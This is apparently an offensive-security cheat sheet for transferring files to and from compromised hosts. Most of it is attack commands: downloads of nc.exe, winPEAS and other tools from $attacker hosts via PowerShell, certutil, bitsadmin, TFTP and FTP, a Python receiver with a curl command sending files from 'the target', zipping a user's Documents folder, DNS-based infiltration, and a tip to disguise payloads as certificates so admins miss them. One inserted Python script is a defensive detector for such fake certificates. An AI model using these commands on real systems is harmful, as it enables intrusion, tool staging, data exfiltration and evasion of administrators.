Important notes
- You have blind code execution that does not always work? Check whether some bad characters are being mangled along the way.
- Outbound ports could be blocked as well. Try to use a port which is open for inbound traffic.
Copy+paste
For Linux:
base64 r > r.b64 ... base64 --decode -i r.b64 > r.tar
For Windows:
base64 p64.exe | sed 's/^\(.*\)$/echo \1 >> b64/'
...
certutil -encode file.exe b64.txt
certutil -decode b64.txt file.exe
Alternative:
python -c "import base64; open('test.b64','wb').write(base64.b64encode(open('test.txt','rb').read()))"
...
python -c "import base64; open('test.txt','wb').write(base64.b64decode(open('test.b64','rb').read()))"
Alternative:
python -m base64 -e test > test.b64 ... python -m base64 -d test.b64 > test
Alternative:
PS> $str = @'
multiline string
'@
PS> [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($str))
Tip: Add the following as the first and last line of the base64-encoded payload before transfer so that it looks nicer and no software or admin would see it as strange 🙂
-----BEGIN CERTIFICATE-----
....
-----END CERTIFICATE-----
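As an added defender-side check (not part of the original post), the following Python script decodes whatever sits between CERTIFICATE markers and tests whether it is structurally a certificate: a real X.509 certificate is one DER SEQUENCE whose declared length covers the whole body, whereas a wrapped executable or archive starts with its own magic bytes. The sample blocks are constructed, not real files.

```python
import base64
import re

# Magic bytes of common payloads that turn up inside bogus CERTIFICATE blocks.
MAGIC = {b"MZ": "PE executable", b"\x7fELF": "ELF executable", b"PK\x03\x04": "ZIP archive"}
PEM_RE = re.compile(r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)


def der_outer_length(buf):
    """Return (declared_length, header_size) of the outermost DER SEQUENCE, or None."""
    if len(buf) < 2 or buf[0] != 0x30:      # every X.509 certificate starts with SEQUENCE
        return None
    first = buf[1]
    if first < 0x80:                        # short-form length
        return first, 2
    n = first & 0x7F                        # long form: n following bytes hold the length
    if n == 0 or n > 4 or len(buf) < 2 + n:
        return None
    return int.from_bytes(buf[2:2 + n], "big"), 2 + n


def check_pem_blocks(text):
    """Classify each CERTIFICATE block in text as 'plausible' or 'suspicious' with a reason."""
    results = []
    for body in PEM_RE.findall(text):
        try:
            raw = base64.b64decode("".join(body.split()), validate=True)
        except ValueError:
            results.append(("suspicious", "body is not valid base64"))
            continue
        kind = next((name for magic, name in MAGIC.items() if raw.startswith(magic)), None)
        if kind:
            results.append(("suspicious", f"payload is a {kind}, not a certificate"))
            continue
        parsed = der_outer_length(raw)
        if parsed is None or sum(parsed) != len(raw):
            results.append(("suspicious", "not a single well-formed DER SEQUENCE"))
        else:
            results.append(("plausible", "outer DER SEQUENCE spans the whole body"))
    return results


# Constructed samples: a PE header wrapped as a "certificate", and a minimal
# DER SEQUENCE (not a real certificate) that passes the structural check.
FAKE_CERT = ("-----BEGIN CERTIFICATE-----\n"
             + base64.encodebytes(b"MZ\x90\x00" + b"\x00" * 60).decode()
             + "-----END CERTIFICATE-----\n")
PLAUSIBLE_CERT = ("-----BEGIN CERTIFICATE-----\n"
                  + base64.b64encode(b"\x30\x03\x02\x01\x05").decode()
                  + "\n-----END CERTIFICATE-----\n")
```

Run it over files that arrive as "certificates" in mail or web uploads; a block that passes the structural test can then be handed to a full X.509 parser for a real verdict.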
Windows
Wget
powershell wget -Uri http://$attacker/nc.exe -OutFile C:\Windows\Temp\nc.exe
Curl
If curl is installed: Start the following Python script as HTTP receiver:
from http.server import BaseHTTPRequestHandler, HTTPServer
import os

class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        file_data = self.rfile.read(content_length)
        # Keep only the base name so a crafted header cannot write outside the working directory
        file_name = os.path.basename(self.headers.get('Filename', 'upload.bin'))
        with open(file_name, 'wb') as f:
            f.write(file_data)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'File uploaded successfully')

    do_PUT = do_POST

server_address = ('', 8080)
httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
httpd.serve_forever()
Then, send the file from the target:
curl -X POST -H "Filename: yourfile.bin" --data-binary "@C:\path\to\yourfile.bin" http://your-linux-server-ip:8080
Certutil
certutil.exe -urlcache -split -f "http://$NTPSRV/file" file
Bitsadmin (deprecated)
bitsadmin /transfer debjob /download /priority normal http://$NTPSRV/beRoot.exe C:\Temp\beRoot.exe
PowerShell
Up to Windows 7:
(New-Object System.Net.WebClient).DownloadFile("http://...", "C:\file.exe")
After Windows 7:
wget http://... -OutFile C:\file.exe
Download in PowerShell:
iwr -uri http://$attacker/winPEASx64.exe -Outfile winPEAS.exe
TFTP
- Start tftp service on another host and put files into the configured directory.
- On the target host, download via the command line.
Start tftp daemon under Linux
# mkdir /tftp
# atftpd --daemon --port 69 /tftp
# cp /usr/share/windows-binaries/nc.exe /tftp/
Download under Windows
tftp -i 10.11.0.5 get nc.exe
Notepad, other programs
For text files:

For binary files:


FTP
If there is no interactive session, create a file and use the non-interactive mode:
USER anonymous
dsfuhdshdsf
bin
lcd C:\Temp
GET nc.exe
mput *.*
bye
Then execute the commands from the file:
ftp -v -i -n -s:ftp.txt 10.10.10.10 [21]
If this doesn’t work, try to omit the port!
Example for WinXP
echo USER anonymous > ftp.txt
echo dsfuhdshdsf >> ftp.txt
echo bin >> ftp.txt
echo get Taihou32.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -i -n -s:ftp.txt 192.168.119.158
Stand-alone FTP server
pip3 install pyftpdlib
python3 -m pyftpdlib -w
SSH
Try to connect back to your SSH server via scp!
Compress files
With PowerShell 5 (Win10), compression is now possible:
powershell -exec bypass Compress-Archive -Path C:\Users\alice\Documents\* -DestinationPath a.zip
Or download 7z and use it as follows:
7za.exe a file.7z .
To extract:
7z x file.7z
DNS extraction / infiltration
Use a DNS server to extract data from, or infiltrate data into, a network.
Infiltration:
- Set a range of TXT records on a domain you own.
- Perform queries like
nslookup -type=txt your-domain.internal
to “import” the external data.
You could also spread the data over a set of subdomains. A pair of scripts can automate this:
- one that base64-encodes a file and creates the TXT records for the domain,
- and another that runs the nslookup queries in sequence and reassembles the base64 data.